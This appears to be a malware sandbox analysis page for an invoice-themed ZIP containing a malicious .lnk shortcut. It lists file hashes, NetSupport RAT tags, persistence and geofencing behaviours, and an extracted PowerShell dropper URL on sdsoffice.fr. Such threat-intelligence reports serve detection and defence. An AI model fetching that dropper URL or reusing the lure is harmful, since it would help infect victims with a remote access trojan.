Overview

overview

10

Static

static

1

Rechnung37...86.lnk

windows7-x64

10

Rechnung37...86.lnk

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    05032024_2022_05032024_Rechnung3777686 M3605066 TEU3777686.zip

  • Size

    68KB

  • Sample

    240305-pkd4jsee7z

  • MD5

    28ab8de3167677f235e079b250446802

  • SHA1

    97ec38d975d39885f24ba21076007d1c23b0af67

  • SHA256

    350a842974df765f33b30c07cdb290e6846dd48d9af8b5851a31beced889d00e

  • SHA512

    e25d8f19df887d81c8ee469b831eaeee43d7b462db5a87e2c97ec09060f5786587d5db4e4311435ec006c3af905b405da04d0177721bda9afb0d9720f306a177

  • SSDEEP

    1536:yB03CP06zUU/x5baWTzcf16WLkLTcK9cQUxowtZhT5:yB0SP06zUKIWvilecV7t

Score
10/10
netsupportpersistencerat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.sdsoffice.fr/test.txt

Targets

    • Target

      Rechnung3777686 M3605066 TEU3777686.lnk

    • Size

      69KB

    • MD5

      234122cf935c5dfb99690848542920f0

    • SHA1

      e1830914af3a5c7968c08afbbe70c931b05987a6

    • SHA256

      f40766eae36bc156e1d05e52d6763b0e80c6adbe91518e76acb3c095fc1514cc

    • SHA512

      10bf42180bc776a346c4ad9e63380001db39ab83ad5caf137f5ac5f91776d5ab12fd4607e9ca674d41dc452a0be6bc3693038b3335be14a35cbd8f0933d21618

    • SSDEEP

      1536:ChHIEFR+bfF3TuA19ow8DPZ4pxXW47NhdEmfjwR6Wts3L75cF:6nFUF3N1P8DPyxB0sxbS

    Score
    10/10
    netsupportpersistencerat

    • NetSupport

      NetSupport is a remote access tool sold as a legitimate system administration software.

      ratnetsupport

    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks